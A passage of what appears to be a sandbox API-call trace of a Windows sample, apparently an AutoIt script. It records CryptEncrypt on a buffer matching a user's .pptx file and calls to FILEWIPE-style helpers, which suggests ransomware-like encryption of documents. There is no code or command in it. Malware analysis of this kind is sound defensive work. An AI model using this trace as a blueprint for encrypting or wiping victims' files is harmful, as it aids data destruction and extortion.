lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0032.907] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0032.907] CryptEncrypt (in: hKey=0x7c2200, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x6ae220*=0xfc8e, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x6ae220*=0xfc90) returned 1 [0032.907] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.907] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.907] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2340 | out: hHeap=0x770000) returned 1 [0032.907] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.907] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.907] CharLowerBuffW (in: lpsz="byte[64657]", cchLength=0xb | out: lpsz="byte[64657]") returned 0xb [0032.907] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.909] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.909] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0032.909] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0032.910] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0032.910] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0032.910] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0032.910] CryptEncrypt (in: hKey=0x7c2200, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x89fc48*, pdwDataLen=0x6ae220*=0xfc8e, dwBufLen=0xfc90 | out: pbData=0x89fc48*, pdwDataLen=0x6ae220*=0xfc90) returned 1 [0032.911] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.911] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.911] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2340 | out: hHeap=0x770000) returned 1 [0032.911] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.912] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.912] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.912] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.913] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0032.913] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1be8 | out: hHeap=0x770000) returned 1 [0032.913] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0032.913] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0032.913] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0032.913] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0032.913] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0032.913] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0032.913] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0032.913] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0032.913] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8b0 | out: hHeap=0x770000) returned 1 [0032.913] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0032.913] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0032.913] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0032.913] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0032.913] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0032.913] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0032.913] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0032.913] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0032.913] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0032.913] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca48 | out: hHeap=0x770000) returned 1 [0032.913] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.918] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0032.919] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0032.919] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0032.919] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0032.922] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0032.922] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0032.922] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0032.922] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0032.922] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0032.922] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0032.922] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0032.922] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0032.922] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0032.922] PeekMessageW (in: lpMsg=0x6ae3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae3fc) returned 0 [0032.922] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0032.922] CryptDestroyKey (hKey=0x7c2200) returned 1 [0032.922] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0032.922] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0032.922] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0032.923] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b17d8 | out: hHeap=0x770000) returned 1 [0032.923] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0032.923] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0032.923] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0032.923] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0032.923] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0032.923] PeekMessageW (in: lpMsg=0x6ae59c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae59c) returned 0 [0032.923] PeekMessageW (in: lpMsg=0x6ae59c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae59c) returned 0 [0032.923] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0032.923] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb68 | out: hHeap=0x770000) returned 1 [0032.923] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0032.923] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0032.923] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0032.923] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0032.923] PeekMessageW (in: lpMsg=0x6ae3d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae3d4) returned 0 [0032.923] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0032.923] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2200 | out: hHeap=0x770000) returned 1 [0032.923] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0032.923] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0032.923] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9a0 | out: hHeap=0x770000) returned 1 [0032.923] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0032.923] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0032.923] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0032.923] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0032.923] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1a80 | out: hHeap=0x770000) returned 1 [0032.923] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0032.923] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0032.923] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0032.923] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0032.923] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0032.923] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0032.924] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0032.924] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0032.924] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c748 | out: hHeap=0x770000) returned 1 [0032.924] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0032.924] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0032.924] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0032.924] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da248 | out: hHeap=0x770000) returned 1 [0032.924] PeekMessageW (in: lpMsg=0x6ae6f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6f4) returned 0 [0032.924] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0032.924] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0032.924] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0032.924] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da248 | out: hHeap=0x770000) returned 1 [0032.924] PeekMessageW (in: lpMsg=0x6ae6e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6e4) returned 0 [0032.924] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0032.924] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1bc0 | out: hHeap=0x770000) returned 1 [0032.924] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da248 | out: hHeap=0x770000) returned 1 [0032.924] PeekMessageW (in: lpMsg=0x6ae6e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6e4) returned 0 [0032.924] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0032.924] CryptReleaseContext (hProv=0x7d5bb8, dwFlags=0x0) returned 1 [0032.924] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0032.924] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0032.924] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0032.924] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0032.924] PeekMessageW (in: lpMsg=0x6ae6e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6e4) returned 0 [0032.924] FreeLibrary (hLibModule=0x754b0000) returned 1 [0032.924] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce38 | out: hHeap=0x770000) returned 1 [0032.924] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1a80 | out: hHeap=0x770000) returned 1 [0032.924] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0032.924] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2200 | out: hHeap=0x770000) returned 1 [0032.924] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0032.925] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab338 | out: hHeap=0x770000) returned 1 [0032.925] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce98 | out: hHeap=0x770000) returned 1 [0032.925] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0032.925] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0032.925] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0032.925] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0032.925] CharUpperBuffW (in: lpsz="FILEWIPE", cchLength=0x8 | out: lpsz="FILEWIPE") returned 0x8 [0032.925] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b17b0 | out: hHeap=0x770000) returned 1 [0032.925] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0032.925] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0032.925] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0032.925] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\AzDr3IFFhU3nWRTgjj.pptx", lpFindFileData=0x6ae7a0 | out: lpFindFileData=0x6ae7a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5b3eda00, ftCreationTime.dwHighDateTime=0x1d5583e, ftLastAccessTime.dwLowDateTime=0x65595e60, ftLastAccessTime.dwHighDateTime=0x1d5ac04, ftLastWriteTime.dwLowDateTime=0x65595e60, ftLastWriteTime.dwHighDateTime=0x1d5ac04, nFileSizeHigh=0x0, nFileSizeLow=0xfc8e, dwReserved0=0x0, dwReserved1=0x777648, cFileName="AzDr3IFFhU3nWRTgjj.pptx", cAlternateFileName="AZDR3I~1.PPT")) returned 0x7c2240 [0032.925] FindClose (in: hFindFile=0x7c2240 | out: hFindFile=0x7c2240) returned 1 [0032.925] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca00 | out: hHeap=0x770000) returned 1 [0032.925] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889c10 | out: hHeap=0x770000) returned 1 [0032.925] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1a58 | out: hHeap=0x770000) returned 1 [0032.925] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0032.926] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0032.926] CharLowerBuffW (in: lpsz="byte[64654]", cchLength=0xb | out: lpsz="byte[64654]") returned 0xb [0032.926] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0032.926] CharUpperBuffW (in: lpsz="MEMSET", cchLength=0x6 | out: lpsz="MEMSET") returned 0x6 [0032.926] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccb8 | out: hHeap=0x770000) returned 1 [0032.926] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0032.926] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0032.926] CharLowerBuffW (in: lpsz="ptr:cdecl", cchLength=0x9 | out: lpsz="ptr:cdecl") returned 0x9 [0032.926] LoadLibraryW (lpLibFileName="msvcrt.dll") returned 0x76b40000 [0032.926] FreeLibrary (hLibModule=0x76b40000) returned 1 [0032.926] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0032.926] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0032.926] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1f8 | out: hHeap=0x770000) returned 1 [0032.926] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1710 | out: hHeap=0x770000) returned 1 [0032.926] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b16c0 | out: hHeap=0x770000) returned 1 [0032.926] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af538 | out: hHeap=0x770000) returned 1 [0032.926] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897c0 | out: hHeap=0x770000) returned 1 [0032.926] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889958 | out: hHeap=0x770000) returned 1 [0032.926] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd18 | out: hHeap=0x770000) returned 1 [0032.926] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c778 | out: hHeap=0x770000) returned 1 [0032.926] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889220 | out: hHeap=0x770000) returned 1 [0032.926] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891d8 | out: hHeap=0x770000) returned 1 [0032.926] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce98 | out: hHeap=0x770000) returned 1 [0032.926] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce38 | out: hHeap=0x770000) returned 1 [0032.926] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cce8 | out: hHeap=0x770000) returned 1 [0032.926] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdd8 | out: hHeap=0x770000) returned 1 [0032.926] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889730 | out: hHeap=0x770000) returned 1 [0032.926] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889910 | out: hHeap=0x770000) returned 1 [0032.926] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce20 | out: hHeap=0x770000) returned 1 [0032.926] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c958 | out: hHeap=0x770000) returned 1 [0032.927] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb98 | out: hHeap=0x770000) returned 1 [0032.927] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0032.927] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0032.927] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cda8 | out: hHeap=0x770000) returned 1 [0032.927] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a60 | out: hHeap=0x770000) returned 1 [0032.927] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c760 | out: hHeap=0x770000) returned 1 [0032.927] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd00 | out: hHeap=0x770000) returned 1 [0032.927] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b85a8 | out: hHeap=0x770000) returned 1 [0032.927] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0032.927] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0032.927] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0032.927] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0032.927] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILE", cchLength=0x12 | out: lpsz="_WINAPI_CREATEFILE") returned 0x12 [0032.927] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b45c8 | out: hHeap=0x770000) returned 1 [0032.927] HeapFree (in: hHeap=0x770000, dwFlags=0x0, 